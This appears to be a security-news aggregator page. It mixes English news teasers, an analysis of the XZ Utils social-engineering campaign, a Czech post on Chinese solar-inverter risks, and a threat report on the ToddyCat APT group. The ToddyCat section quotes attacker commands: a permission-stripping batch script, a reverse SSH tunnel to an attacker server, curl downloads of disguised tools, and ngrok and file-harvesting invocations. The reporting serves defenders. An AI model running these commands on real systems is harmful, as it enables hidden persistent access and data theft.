Viry a Červi

The firm 'fessed up to staff misconduct and avoided criminal liability

A company contracted to manage an Amarillo, Texas nuclear weapons facility has to pay US government $18.4 million in a settlement over allegations that its atomic boffins fudged their timesheets to collect more money from Uncle Sam.…

Privacy Sandbox slips into 2025 after challenges from UK authorities

Google's plan to phase out third-party cookies in Chrome is being postponed to 2025 amid wrangling with the UK's Competition and Markets Authority (CMA) and Information Commissioner's Office (ICO).…

Their holiday options are now far more restricted

The US has charged and sanctioned four Iranian nationals for their alleged roles in various attacks on US companies and government departments, all of whom are claimed to have worked for fake companies linked to Iran's military.…

High-end APT groups perform highly interesting social engineering campaigns in order to penetrate well-protected targets. For example, carefully constructed forum responses on precision targeted accounts and follow-up “out-of-band” interactions regarding underground rail system simulator software helped deliver Green Lambert implants in the Middle East. And, in what seems to be a learned approach, the XZ Utils project penetration was likely a patient, multi-year approach, both planned in advance but somewhat clumsily executed.

This recently exposed offensive effort slowly introduced a small cast of remote characters, communications, and malicious code to the more than decade old open-source project XZ Utils and its maintainer, Lasse Collin. The backdoor code was inserted in February and March 2024, mostly by Jia Cheong Tan, likely a fictitious identity. The end goal was to covertly implement an exclusive use backdoor in sshd by targeting the XZ Utils build process, and push the backdoored code to the major Linux distributions as a part of a large-scale supply chain attack.

While this highly targeted and interactive social engineering approach might not be completely novel, it is extraordinary. Also extraordinary is the stunningly subtle insertion of malicious code leveraging the build process in plain sight. This build process focus during a major supply chain attack is comparable only to the CozyDuke/DarkHalo/APT29/NOBELIUM Solarwinds compromise and the SUNSPOT implant’s cunning and persistent presence – its monitoring capability for the execution of a Solarwinds build, and its malicious code insertion during any Solarwinds build execution. Only this time, it’s human involvement in the build process.

It’s notable that one of the key differentiators of the Solarwinds incident from prior supply chain attacks was the adversary’s covert, prolonged access to the source/development environment. In this XZ Utils incident, this prolonged access was obtained via social engineering and extended with fictitious human identity interactions in plain sight.

One of the best publicly available chronological timelines on the social engineering side of the XZ Utils incident is posted by Russ Cox, currently a Google researcher. It’s highly recommended reading. Notably, Cox writes: “This post is a detailed timeline that I have constructed of the social engineering aspect of the attack, which appears to date back to late 2021.”

A Singaporean guy, an Indian guy, and a German guy walk into a bar…

Three identities pressure XZ Utils creator and maintainer Lasse Collin in summer 2022 to provoke an open-source code project handover: Jia Tan/Jia Cheong Tan, Dennis Ens, and Jigar Kumar. These identities are made up of a GitHub account, three free email accounts with similar name schemes, an IRC and Ubuntu One account, email communications on XZ Utils developer mailing lists and downstream maintainers, and code. Their goal was to grant full access to XZ Utils source code to Jia Tan and subtly introduce malicious code into XZ Utils – the identities even interact with one another on mail threads, complaining about the need to replace Lasse Collin as the XZ Utils maintainer.

Note that the geographic dispersion of fictitious identities is a bit forced here, perhaps to dispel hints of coordination: Singaporean or Malaysian (possibly of a Hokkien dialect), northern European, and Indian. Misspellings and grammar mistakes are similar across the three identities’ communications. The “Jia Tan” identity seems a bit forced as well – the only public geolocation data is a Singaporean VPN exit node that the identity may have used on March 29 to access the XZ Utils Libera IRC chat. If constructing a fictitious identity, using that particular exit node would definitely be a selected resource.

Our pDNS confirms this IP as a Witopia VPN exit. While we might expect a “jiat75” or “jiatan018” username for the “Jia Tan” Libera IRC account, this one in the screenshot above may have been used on March 29, 2024 by the “JiaT75” actor.

One additional identity, Hans Jansen, introduced a June 2023 performance optimization into the XZ Utils source, committed by Collin, and later leveraged by jiaT75’s backdoor code. Jia Tan gleefully accepted the proposed IFUNC additions: “Thanks for the PR and the helpful links! Overall this seems like a nice improvement to our function-picking strategy for CRC64. It will likely be useful when we implement CRC32 CLMUL too :)”.

This pull request is the Jansen identities’ only interaction with the XZ Utils project itself. And, unlike the other two identities, the Jansen account is not used to pressure Collin to turn over XZ Utils maintenance. Instead, the Hans Jansen identity provided the code and then disappeared. Nine months later, following the backdoor code insertion, Jansen urged a major Linux vendor in the supply chain to incorporate the backdoored XZ Utils code in their distribution. The identity resurfaced on a Debian bug report on March 24, 2024, creating an opportunity to generate urgency in including the backdoored code in the Debian distribution.

Jia Tan Identity and Activity

The Jia Cheong Tan (JiaT75) GitHub account, eventually promoted to co-maintainer of XZ Utils, which inserted the malicious backdoor code, was created January 26, 2021. JiaT75 was not exclusively involved in XZ Utils, having authored over 500 patches to multiple GitHub projects going back to early 2022.

• oss-fuzz
• cpp-docs
• wasmtime
• xz

These innocuous patches helped to build the identity of JiaT75 as a legitimate open source contributor and potential maintainer for the XZ Utils project. The patch efforts helped to establish a relationship with Lasse Collin as well.

The first JiaT75 code contribution to XZ Utils occurred on October 29, 2021. It was sent to the xz-devel mailing list. It was a very simple editor config file introduction. Following this initial innocuous addition, over the next two years, JiaT75 authored hundreds of changes for the XZ project.

Yes, JiaT75 contributed code on both weekends and what appear to be workdays. However, an interesting anomaly is that the 2024 malicious commits occur out of sync with many previous commits. A Huntress researcher going by the alias “Alden” posted a visualization of the malicious Jia Tan commits to XZ Utils. JiaT75 commits the malicious code completely out of sync with prior work times on Feb 23–26, and March 8 and 9, 2024.

The time differences for the malicious commits is noticeable. What might this anomaly suggest? We speculate on several possibilities:

• the JiaT75 account was used by a second party to insert the malicious code, either known or unknown to the individual contributor.
• the JiaT75 individual contributor was rushed to commit the malicious backdoor code.
• the JiaT75 account was run by a team of individuals and one part of the team needed to work without interruption outside of the usual constructed work day.

Especially devious is the manner in which the obfuscated backdoor code is introduced in multiple separate pieces by JiaT75. Even though it was open-source, the bulk of the backdoor does not show up in the XZ source-code tree, is not human readable, and was not recognized.

Summer 2022 Pressure to Add a Maintainer

Multiple identities of interest pressured Lasse Collin to add a maintainer over the summer of 2022. The intensity of pressure on Collin varies per account, but they all create opportunities to pressure Collin and interact.

Name GitHub Account Email Creation Jia Tan/Jia Cheong Tan JiaT75 [email protected] January 26, 2021 Dennis Ens – [email protected] – Jigar Kumar – [email protected] –

If we take the first interaction on the xz-devel mailing list as the start of the campaign, Jia Tan sent a superficial code patch on September 29, 2021. This timestamp is eight months after the github account creation date. This initial contribution is harmless, but establishes this identity within the open-source project.

A year later, Jigar Kumar pressured Lasse Collin to hand over access to Jia Tan over the spring and summer of 2022 in six chiding comments over two different threads.

Wed, 27 Apr 2022 11:42:57 -0700 Re: [xz-devel] [PATCH] String to filter and filter to string “Your efforts are good but based on the slow release schedule it will unfortunatly be years until the community actually gets this quality of life feature.” Thu, 28 Apr 2022 10:10:48 -0700 Re: [xz-devel] [PATCH] String to filter and filter to string “Patches spend years on this mailing list. 5.2.0 release was 7 years ago. There
is no reason to think anything is coming soon.” Fri, 27 May 2022 10:49:47 -0700 Re: [xz-devel] [PATCH] String to filter and filter to string “Over 1 month and no closer to being merged. Not a suprise.” Tue, 07 Jun 2022 09:00:18 -0700 Re: [xz-devel] XZ for Java “Progress will not happen until there is new maintainer. XZ for C has sparse
commit log too. Dennis you are better off waiting until new maintainer happens
or fork yourself. Submitting patches here has no purpose these days. The
current maintainer lost interest or doesn’t care to maintain anymore. It is sad
to see for a repo like this.” Tue, 14 Jun 2022 11:16:07 -0700 Re: [xz-devel] XZ for Java “With your current rate, I very doubt to see 5.4.0 release this year. The only
progress since april has been small changes to test code. You ignore the many
patches bit rotting away on this mailing list. Right now you choke your repo.
Why wait until 5.4.0 to change maintainer? Why delay what your repo needs?” Wed, 22 Jun 2022 10:05:06 -0700 Re: [xz-devel] [PATCH] String to filter and filter to string “Is there any progress on this? Jia I see you have recent commits. Why can’t you
commit this yourself?”

The Dennis Ens identity sets up a thread of their own, and follows up by pressuring maintainer Collin in one particularly forceful and obnoxious message to the list. The identity leverages a personal vulnerability that Collin shared on this thread. The Jigar Kumar identity responds twice to this thread, bitterly complaining about the maintainer: “Dennis you are better off waiting until new maintainer happens or fork yourself.”

Thu, 19 May 2022 12:26:03 -0700 XZ for Java “Is XZ for Java still maintained? I asked a question here a week ago
and have not heard back. When I view the git log I can see it has not
updated in over a year. I am looking for things like multithreaded
encoding / decoding and a few updates that Brett Okken had submitted
(but are still waiting for merge). Should I add these things to only
my local version, or is there a plan for these things in the future?” Tue, 21 Jun 2022 13:24:47 -0700 Re: [xz-devel] XZ for Java I am sorry about your mental health issues, but its important to be
aware of your own limits. I get that this is a hobby project for all
contributors, but the community desires more. Why not pass on
maintainership for XZ for C so you can give XZ for Java more
attention? Or pass on XZ for Java to someone else to focus on XZ for
C? Trying to maintain both means that neither are maintained well.

Reflecting on these data points still leads us to shaky ground. Until more details are publicized, we are left with speculation:

• In a three-year project, a small team successfully penetrated the XZ Utils codebase with a slow and low-pressure campaign. They manipulated the introduction of a malicious actor into the trusted position of code co-maintainer. They then initiated and attempted to speed up the process of distributing malicious code targeting sshd to major vendor Linux distributions
• In a three-year project, an individual successfully penetrated the XZ Utils codebase with a slow and low-pressure campaign. The one individual managed several identities to manipulate their own introduction into the trusted position of open source co-maintainer. They then initiated and attempted to speed up the process of distributing malicious code targeting sshd to major vendor Linux distributions
• In an extremely short timeframe in early 2024, a small team successfully manipulated an individual (Jia Tan) that legitimately earned access to an interesting open-source project as code maintainer. Two other individuals (Jigar Kumar, Dennis Ens) may have coincidentally complained and pressured Collin to hand over the maintainer role. That leveraged individual began inserting malicious code into the project over the course of a couple of weeks.

Spring 2024 Pressure to Import Backdoored Code to Debian

Several identities attempted to pressure Debian maintainers to import the backdoored upstream XZ Utils code to their distribution in March 2024. The Hans Jansen identity created a Debian report log on March 25, 2024 to raise urgency to include the backdoored code: “Dear mentors, I am looking for a sponsor for my package “xz-utils”.”

Name Email address Hans Jansen [email protected] krygorin4545 [email protected] [email protected] [email protected]

The thread was responded to within a day by additional identities using the email address scheme name-number@freeservice[.]com:

Date: Tue, 26 Mar 2024 19:27:47 +0000 From: krygorin4545 <[email protected]> Subject: Re: RFS: xz-utils/5.6.1-0.1 [NMU] — XZ-format compression utilities Also seeing this bug. Extra valgrind output causes some failed tests for me. Looks like the new version will resolve it. Would like this new version so I can continue work Date: Tue, 26 Mar 2024 22:50:54 +0100 (CET) From: [email protected] Subject: Re: RFS: xz-utils/5.6.1-0.1 [NMU] — XZ-format compression I noticed this last week and almost made a valgrind bug. Glad to see it being fixed. Thanks Hans!

The code changes received pushback from Debian contributors:

Date: Tue, 26 Mar 2024 19:27:47 +0000 From: krygorin4545 <[email protected]> Subject: new upstream versions as NMU vs. xz maintenance Very much *not* a fan of NMUs doing large changes such as
new upstream versions.But this does give us the question, what’s up with the
maintenance of xz-utils? Same as with the lack of security
uploads of git, which you also maintain, are you active? Are you well?

To which one of these likely sock puppet accounts almost immediately responded, in order to counteract any distraction from pushing the changes:

Date: Wed, 27 Mar 2024 12:46:32 +0000 From: krygorin4545 <[email protected]> Subject: Re: Bug#1067708: new upstream versions as NMU vs. xz maintenance Instead of having a policy debate over who is proper to do this upload, can this just be fixed? The named maintainer hasn’t done an upload in 5 years. Fedora considered this a serious bug and fixed it weeks ago (). Fixing a valgrind break across many apps throughout Debian is the priority here. What NeXZt?

Clearly social engineering techniques have much lower technical requirements to gain full access to development environments than what we saw with prior supply chain attacks like the Solarwinds, M.E.Doc ExPetya, and ASUS ShadowHammer incidents. We have presented and compared these particular supply chain attacks, their techniques, and their complexities, at prior SAS events [registration required], distilling an assessment into a manageable table.

Unfortunately, we expect more open-source project incidents like XZ Utils compromise to be exposed in the months to come. As a matter of fact, at the time of this writing, the Open Source Security Foundation (OSSF) has identified similar social engineering-driven incidents in other open-source projects, and claims that the XZ Utils social engineering effort is highly likely not an isolated incident.

One wonders why are there adverts on public-sector portals at all

Exclusive  At least 18 public-sector websites in the UK and US send visitor data in some form to various web advertising brokers – including an ad-tech biz in China involved in past privacy controversies, a security firm claims.…

The 'big victory for the good guys' shouldn't be celebrated too much, though

The average time taken by global organizations to detect cyberattacks has dropped to its lowest-ever level of ten days, Mandiant revealed today.…

That said, good ol' American healthcare system so elaborately costly, some are forced to avoid altogether

UnitedHealth Group, the parent of ransomware-struck Change Healthcare, delivered some very unwelcome news for customers today as it continues to recover from the massively expensive side and disruptive digital break-in.…

City council says it lost control after shutting down systems

It's become somewhat cliché in cybersecurity reporting to speculate whether an organization will have the resources to "keep the lights on" after an attack. But the opposite turns out to be true with Leicester City Council following its March ransomware incident.…

Unverified users could scoop up data on high-value individuals without any form of verification process

Neighbourhood Watch (NW) groups across the UK can now rest easy knowing the developers behind a communications platform fixed a web app bug that leaked their data en masse.…

Nedávno mě zaujal rozhovor s Radkem Špicarem, víceprezidentem Svazu průmyslu a dopravy, který prohlásil, že „Čínská elektroauta nejsou jen konkurence válcující evropské automobilky, ale také možné bezpečnostní riziko“ a že se o této problematice příliš nemluví. Ivo Zelinka pak na X navázal příspěvkem, „Máte rádi trojské koně? Pak pro vás mají čínské automobilky skvělou zprávu – můžete si takového koně levně pořídit„. Já bych si tedy dovolil navázat daleko větším problémem, o kterém se též nemluví. A to jsou čínské fotovoltaické systémy na střechách rodinných domů, na které lze navíc žádat o dotace typu „Zelená úsporám“…

Čína je hrozba

To, že je Čína hrozbou, se lze dočíst pravidelně ve zprávách BIS či o tom slyšet hovořit hlavu státu. Do praxe to ale nemá prakticky žádný dopad. Patrně se čeká na první „průser“. Obrovskému podílu čínských fotovoltaických systémů napomáhá i fakt, že množství evropských výrobců FVE střídačů spočítá na prstech jedné ruky i ten, kdo si jich pár nechal v cirkulárce. Pokud si přesto někdo vybere z evropské konkurence (pozor na rebrandy čínských značek!), často ho pak odradí cena. U panelů je situace ještě horší.

Čína je lídr

Sám mám na střeše čínské panely a ve sklepě čínský střídač značky SOLAX. O jeho kvalitách nepochybuji, nicméně vhled do IT bezpečnosti mě už před instalací dovedl k tomu, že prvním krokem po spuštění elektrárny bude to, že ji prostě odstřihnu od internetu. Pro FVE systémy je naprosto typické, že je lze ovládat a sledovat přes cloud, resp. mobilní zařízení či webový portál. Vlastně často ani jiná rozumná varianta neexistuje, pokud chcete o FVE vědět alespoň něco. Výrobce tak automaticky sbírá řadu cenných informací. Nedělám si iluze, že je nesbírají západní společnosti i v jiných odvětvích, nicméně jak říká jeden kamarád: „radši se nechám odposlouchávat ze západu, než z východu“.

Kromě toho ale víme, že výrobci mají k dispozici často větší množství nástrojů, než samotný majitel fotovoltaiky. Konkrétně například u značky SOLAX je Vám schopna technická podpora přes internet upgradovat firmware jednotlivých komponent. Stačí je o to požádat e-mailem. Pokud se o upgrade firmware pokusí sám majitel, bude k tomu potřebovat patřičně nastavený USB flashdisk, strčený do střídače.

Tchaj-wan

Modleme se, aby nikdy nevypukl konflikt mezi západem a Čínou např. o Tchaj-wan. Pokud by eskaloval, mohlo by dojít minimálně k tomu, na co upozorňuje p. Špicar. Plus, pokud nás Rusko dokázalo vydírat vypínáním / zapínáním plynu, což bylo pár let dozadu nemyslitelné, proč by nemohla Čína vydírat skrze chytrá IOT zařízení (včetně FVE), když jsou v drtivé většině Čínského původu a je s nimi prošpikovaná celá Evropa?

Chyby a uživatel

Zpět však do pozitivnější reality On tedy ten „průser“ může přijít daleko jednodušší cestou. Připomeňme, že majitel FVE může být typově naprosto stejný člověk, který například na bazoši prodává kalhoty za pár stovek a nechá se přitom okrást o 200 tisíc, může to být zároveň ten, který používá jedno jednoduché heslo na všechny služby či ten, který vůbec nezná pojem jako „dvoufázové ověření“ nebo 2FA (zde je teda dobré podotknout, že 2FA neznají ani někteří výrobci střídačů!!!). Můžeme se tak brzo dočkat kauz, kdy prostě někdo získá kontrolu nad cizí elektrárnou a minimálně tak majiteli doma zhasne. Neúmyslné chyby (a nebo úmyslné plynoucí z lajdáctví a neznalosti) ale mohou dělat i samotní výrobci střídačů či jiných chytrých IOT zařízení. Zde je pár kauz, popsaných přímo na viry.cz:

https://viry.cz/zavirovani-automobilu-pres-internet/
https://viry.cz/hrozba-v-rozkroku/
https://viry.cz/kulma-na-vlasy-s-ovladanim-pres-mobil-je-tu/

Co s tím?

Nejednodušší je zvážit, zda opravdu musíte mít chytré zařízení dostupné z internetu. Zda nenechat WiFi čističku vzduchu či WiFi pračku opravdu „tupou“ a ovládat ji fyzicky tak, že k ní prostě příjdete. To stejné u střídače fotovoltaiky a dalších zařízení. Pokud to možné není, pak je cestou provozovat tato zařízení alternativně tak, jak je nebude používat drtivá většina ostatních uživatelů. Jakmile pak příjde chvíle útočníka či k tomu povede geopolitická situace, je skoro jasné, že vektor útoku bude veden tak, aby postihl co možná největší skupinu uživatelů (tedy na cloudovou infrastrukturu).

Tímhle „alternativním“ užitím můžete paradoxně nakonec dojít i k daleko vyššímu komfortu užívání těchto chytrých zařízení. Už jen z důvodu, že nemusíte mít v mobilním telefonu 10 aplikací od každého výrobce, nýbrž jednu, většinou i „vymazlenější“. Ale o tom snad příští týden Vpravo nahoře se můžete přihlásit k odběru, abyste o to nepřišli.

Výňatek z rozhovoru mezi Radkem Špicarem a Čestmírem Strakatým lze najít zde:

„Čínská elektroauta nejsou jen konkurence válcující evropské automobilky, ale také možné bezpečnostní riziko,“ tvrdí viceprezident Svazu průmyslu a dopravy Radek Špicar (@R_Spicar_SP_CR) v podcastu Crunch s @cestmirstrakaty.

Celý podcast: https://t.co/Sro6C4Wq7m pic.twitter.com/K0FTicBR1m

— CzechCrunch (@czechcrunch) April 18, 2024

Příspěvek Ivo Zelenky pak tady:

Máte rádi koně?

Pak pro vás mají čínské automobilky skvělou zprávu – můžete si takového koně levně pořídit

Pokud vám tedy nebude vadit, že váš nový elektromobil je Trojský kůň…

Proč jsou elektromobily pro špionáž lepší než spalováky? Uzávěrka odpovědí ve 22:00. pic.twitter.com/G9reg8DP4C

— Ivo Zelinka (@IvoZelinka) April 21, 2024

The post Máte rádi trojské koně? Pořiďte si čínskou fotovoltaiku! appeared first on VIRY.CZ.

Outsourcers outsourced work for the BBC, Amazon, and HBO Max to the hermit kingdom

A misconfigured cloud server that used a North Korean IP address has led to the discovery that film production studios including the BBC, Amazon, and HBO Max could be inadvertently using workers from the hermit kingdom for animation projects.…

Putin's pals use 'GooseEgg' malware to launch attacks you can defeat with patches or deletion

Russian spies are exploiting a years-old Windows print spooler vulnerability and using a custom tool called GooseEgg to elevate privileges and steal credentials across compromised networks, according to Microsoft Threat Intelligence.…

Senate kills reform amendments, Biden swiftly signs bill into law

US lawmakers on Saturday reauthorized a contentious warrantless surveillance tool for another two years — and added a whole bunch of people and organizations to the list of those who can be compelled to spy for Uncle Sam.…

Don't bore us, get to the chorus: You need less privacy so we can protect the children

Yet another international cop shop has come out swinging against end-to-end encryption - this time it's Europol which is urging an end to implementation of the tech for fear police investigations will be hampered by protected DMs.…

Prosecutors believe one frikkin' laser did make its way to Beijing

Germany has arrested three citizens who allegedly tried to transfer military technology to China, a violation of the country's export rules.…

Meta insists it's just misunderstood and it's safe to talk to citizens over FB

The Dutch Data Protection Authority (AP) has warned that government organizations should not use Facebook to communicate with the country's citizens unless they can guarantee the privacy of data.…

Sadly no push to end stupid TikTok dances, but ByteDance would have year to offload app stateside

Fresh US legislation to force the sale of TikTok locally was passed in Washington over the weekend after an earlier version stalled in the Senate.…

Leaked draft report says stated goals still come up short

Google's Privacy Sandbox, which aspires to provide privacy-preserving ad targeting and analytics, still isn't sufficiently private.…

Facing down the triple threat of ransomware, data breaches and criminal extortion

Sponsored  On the face of it, there really isn't much of an upside for the current UK government after MPs described its response to attacks by cyber-espionage group APT31 as 'feeble, derisory and sadly insufficient.'…

We continue covering the activities of the APT group ToddyCat. In our previous article, we described tools for collecting and exfiltrating files (LoFiSe and PcExter). This time, we have investigated how attackers obtain constant access to compromised infrastructure, what information on the hosts they are interested in, and what tools they use to extract it.

ToddyCat is an APT group that predominantly targets governmental organizations, some of them defense related, located in the Asia-Pacific region. One of the group’s main goals is to steal sensitive information from hosts.

During the observation period, we noted that this group stole data on an industrial scale. To collect large volumes of data from many hosts, attackers need to automate the data harvesting process as much as possible, and provide several alternative means to continuously access and monitor systems they attack. We decided to investigate how this was implemented by ToddyCat. Note that all tools described in this article are applied at the stage where the attackers have compromised high-privileged user credentials allowing them to connect to remote hosts. In most cases, the adversary connected, transferred and run all required tools with the help of PsExec or Impacket.

Tools for traffic tunneling

Having several tunnels to the infected infrastructure implemented with different tools allow attackers to maintain access to systems even if one of the tunnels is discovered and eliminated. By securing constant access to the infrastructure, attackers are able to perform reconnaissance and connect to remote hosts.

Reverse SSH Tunnel

One way to gain access to remote network services is to create a reverse SSH tunnel.

Attackers use several files to launch a reverse SSH tunnel:

1. The SSH client from the OpenSSH for Windows toolkit, along with the library required for running it
2. An OPENSSH private key file
3. The “a.bat” script to hide the private key file

The attackers transferred all files to the target host via SMB with the help of shared folders (T1021.002: Remote Services: SMB/Windows Admin Shares).

The attackers did not attempt to hide the presence of the SSH client file in the system. The file retained its original name and was placed inside folders whose names indicated the presence of an SSH client in the system.

C:\program files\OpenSSH\ssh.exe C:\programdata\sshd\ssh.exe C:\programdata\ssh\ssh.exe

The private key files required for establishing a connection to the remote server were copied to the following paths.

C:\Windows\AppReadiness\read.ini C:\Windows\AppReadiness\data.dat C:\Windows\AppReadiness\log.dat C:\Windows\AppReadiness\value.dat

OpenSSH private key files are normally created without extensions, but they can be given the extension .key or similar. In the example, the attackers used .ini and .dat extensions for private key files, obviously to hide their true purpose. Files like that look less suspicious in the command-line interface than .key files or files without an extension.

After the private key files have been copied to the AppReadiness folder, the adversary copies and runs an a.bat script. In the attacked systems, it was found mostly in temporary directories or in users’ shared folders.

c:\users\public\a.bat

This file contains the following commands.

@echo off ::# Set Key File Variable: Set Key="C:\Windows\AppReadiness" takeown /f "%Key%" icacls "%Key%" /remove "BUILTIN\Administrators" > "%temp%\a.txt" icacls "%Key%" /remove "Administrators" >> "%temp%\a.txt" icacls "%Key%" /remove "NT AUTHORITY\Authenticated Users" >> "%temp%\a.txt" icacls "%Key%" /remove "CREATOR OWNER" >> "%temp%\a.txt" icacls "%Key%" /remove "BUILTIN\Users" >> "%temp%\a.txt" icacls "%Key%" /remove "Users" >> "%temp%\a.txt" icacls "%Key%" >> "%temp%\a.txt" ::# Remove Variable: set "Key="

In Windows, C:\Windows\AppReadiness is part of the AppReadiness service and stores application files for initial configuration when applications are first launched or when a user logs on for the first time.

The icacls command output for the AppReadiness folder with default values

The image above shows the default permissions for this folder:

• Administrators and system: full permissions
• Authorized users: read-only permissions

This means that regular users can view the contents of the folder.

The a.bat script sets the system as the owner of the folder and removes all other users from its discretionary access control list (DACL). The image below shows the DACL for C:\Windows\AppReadiness after the script has run:

The icacls command output for the AppReadiness folder after a.bat script has executed

Once the permissions have been changed, neither normal users nor administrators will be able to access this folder. Attempting to open it will cause a “no permission” error.

Access denied error and Security tab for the AppReadiness folder

To start the tunnel, attackers create a scheduled task that runs the following command.

C:\PROGRA~1\OpenSSH\ssh.exe -i C:\Windows\AppReadiness\value.dat -o StrictHostKeyChecking=accept-new -R 31481:localhost:53 systemtest01@103[.]27.202.85 -p 22222 -fN

This command creates an SSH connection to a remote server with the IP address 103[.]27.202.85 on port 22222 as the user named systemtestXX, where XX is a number. This connection will redirect network traffic from a certain port on the server to a certain port on the infected host. This is needed to provide the malicious server with constant access to the services running on the target host and listening on the specified port.

In the example above, the user systemtest01 establishes a connection that redirects traffic from port 31481 on the server to port 53 on the target host. A connection like this created on domain controllers allows attackers to obtain the IP addresses of hosts on the internal network through DNS queries.

Each user is assigned to a different port on the infected host. For example, the user systemtest05 redirects traffic from the malicious server to port 445, normally used by SMB services.

The remote server IP information is shown in the table below.

IP Country + ASN Net name Net Description Address Email 103.27.202[.]85 Thailand, AS58955 BANGMOD-VPS-NETWORK Bangmod VPS Network Bangmod-IDC Supermicro Thailand Powered by CSloxinfo [email protected]

The whole process of creating an SSH tunnel can be described with the diagram given below.

Diagram of SSH tunnel creation

SoftEther VPN

The next tool that the attackers used for tunneling was the server utility (VPN Server) from the SoftEther VPN package.

SoftEther VPN is an open-source solution developed as part of academic research at the University of Tsukuba that allows creating VPN connections via many popular protocols, such as L2TP/IPsec, OpenVPN, MS-SSTP, L2TPv3, EtherIP and others.

To launch the VPN server, the attackers used the following files:

• vpnserver_x64.exe: a digitally signed VPN server executable
• hamcore.se2: a container file that includes components required to run vpnserver_x64.exe
• vpn_server.config: server configuration

In the operating system, the VPN server can run as a service or as an application with a GUI. The mode is set via a command-line parameter.

In virtually every case we observed, the attackers renamed vpnserver_x64.exe to hide its purpose in the infected system. The following names of, and paths to, this file are known:

c:\programdata\ssh\vmtools.exe c:\programdata\lenovo\lenovo\kln.exe c:\programdata\iobit\iobitrtt\tmp\mstime.exe c:\perflogs\ecache\boot.exe C:\users\public\music\wia.exe c:\windows\debug\wia\wia.exe c:\users\public\music\taskllst.exe c:\programdata\lenovo\lenovo\main.exe c:\programdata\intel\gcc\gcc\boot.exe c:\programdata\lenovo\lenovodisplaycontrolcenterservice\netscan.exe c:\programdata\kasperskylab\kaspersky.exe

You may notice that in some cases, the attackers used the names of security products to conceal the purpose of the file.

The file hamcore.se2 was not renamed in the attacked systems, as it was loaded by the VPN server by name from the same folder where the VPN server executable was located.

To transfer the tools to victim hosts, the attackers used their standard technique of copying files through shared resources (T1021.002 Remote Services: SMB/Windows Admin Shares), and downloaded files from remote resources using the curl utility (see below).

"cmd.exe" /C curl http://www.netportal.or[.]kr/common/css/main.js -o c:\windows\debug\wia\wia.exe > C:\WINDOWS\Temp\vwqkspeq.tmp 2>&1 "cmd.exe" /C curl http://www.netportal.or[.]kr/common/css/ham.js -o c:\windows\debug\wia\hamcore.se2 > C:\WINDOWS\Temp\nohEicOE.tmp 2>&1

We observed the following remote resources being used as download sources.

URL Original file name hxxp://www.netportal.or[.]kr/common/css/main.js vpnserver_x64.exe hxxp://www.netportal.or[.]kr/common/css/ham.js Hamcore.se2 hxxp://23.106.122[.]5/hamcore.se2 Hamcore.se2 hxxps://etracking.nso.go[.]th/UserFiles/File/111/tasklist.exe vpnserver_x64.exe hxxps://etracking.nso.go[.]th/UserFiles/File/111/hamcore.se2 Hamcore.se2

In most cases, the configuration file was copied along with the server executable. However, in some cases, it was not copied but created by executing vpnserver_x64.exe with the options /install or /usermode_hidetray, and then edited.

"cmd.exe" /C c:\users\public\music\taskllst.exe /install > C:\Windows\Temp\fnOcaiqm.tmp 2>&1 "cmd.exe" /C c:\users\public\music\taskllst.exe /usermode_hidetray > C:\Windows\Temp\TSwkLRsR.tmp

In this case, after installing the server in the system, the attackers changed the server settings in vpn_server.config.

Data for connecting the remote client to the server and its authentication details are added to the configuration file:

AccountName Hostname ha.bbmouseme[.]com 118[.]193.40.42 Ngrok agent and Krong

Another way the attackers accessed the remote infrastructure was by tunneling to a legitimate cloud provider. An application running on the user’s host with access to the local infrastructure can connect through a legitimate agent to the cloud and redirect traffic or run certain commands.

Ngrok is a lightweight agent that can redirect traffic from endpoints to cloud infrastructure and vice versa. The attackers installed ngrok on target hosts and used it to redirect C2 traffic from the cloud infrastructure to a certain port on these hosts.

The agent can be started, for instance, with the following command.

"cmd" /c "cd C:\windows\temp\ & Intel.exe tcp --region=ap --remote-addr=1.tcp.ap.ngrok.io:21146 54112 -- authtoken 2GskqGD<token>txB7WyV"

The port where ngrok redirects C2 traffic is also the port that another tool, Krong, listens on. Krong is a DLL file side-loaded (T1574.002 Hijack Execution Flow: DLL Side-Loading) with a legitimate application digitally signed by AVG TuneUp. The tool receives through the command-line interface the address and the port on which to expect a connection.

"cmd" /c "cd C:\windows\temp\ & SystemInformation.exe 0.0.0.0 54112"

Krong is a proxy that encrypts the data transmitted through it using the XOR function.

Code snippet for deciphering received data

This allows Krong to hide the contents of the traffic to evade detection.

FRP client

After creating tunnels on target hosts using OpenSSH or SoftEther VPN, attackers additionally install the FRP client. FRP is a fast reverse proxy written in Go that allows access from the Internet to a local server located behind a NAT or firewall. FRP has a web interface for changing settings and viewing connection statistics.

The attackers used two files to run the client:

• Frpc.exe: a FRP client executable file
• Frpc.toml: a client configuration file

The files are given arbitrary names. Also, the configuration file extension is changed from the standard .toml to .ini, as is the case with OpenSSH private key files.

After copying the files to the target host, the attackers create a service with an arbitrary name, which is started via the following command.

c:\windows\debug\tck.exe -c c:\windows\debug\tc.ini

This starts the FRP client with the configuration file “tc.ini”. The traffic is then routed from C2 through this tool.

Data collection tools Cuthead for data collection

Recently, ToddyCat started using a new tool we named cuthead to search for documents. The name originated from the “file description” field of the sample we found. It is a .NET compiled executable designed to search for files and store those it finds inside an archive. The tool can search for specified file extensions or words in the file name.

Cuthead tool accepts the following arguments:

fkw.exe <date> <extensions> [keywords]

• Date: the date when the file was last modified, in yyyyMMdd The search looks for files modified on that date or later
• Extensions: a string without spaces that contains file extensions separated by semicolons
• Keywords: a string without spaces that contains semicolon-delimited words to look for in file names

Here is an example of a cuthead launch command.

"c:\intel\fkw.exe" 20230626 pdf;doc;docx;xls;xlsx

In this case, the attackers collected all MS Excel, MS Word and PDF files modified after June 26, 2023.

Once launched, the tool processes the command-line parameters and begins a recursive search for files in the file system on all available drives (T1005 Data from Local System). Folders that contain the following substrings are excluded from the search.

$ Windows Program Files Programdata Application Data Program Files (x86) Documents and Settings

Also, the files are excluded from the search if they meet the following criteria:

• The file size is greater than 50 Mb (52428800 bytes).
• The file extensions do not match those specified in the command-line parameters.
• The names do not contain the keywords specified in the command-line parameters.

A list of files found by the search is passed to the function that creates ZIP archives with the password “Unsafe404”. In different versions of the tool, this function has different names but the same purpose. The open-source tool icsharpcode/SharpZipLib v. 0.85.4.369 is used for creating archives (T1560.002 Archive Collected Data: Archive via Library).

Several later variants of cuthead were found with all required options – a list of file extensions and a last modified date that was typically within the previous 7 days – hardcoded within the software. We believe this was done to automate the collection process.

WAExp: WhatsApp data stealer

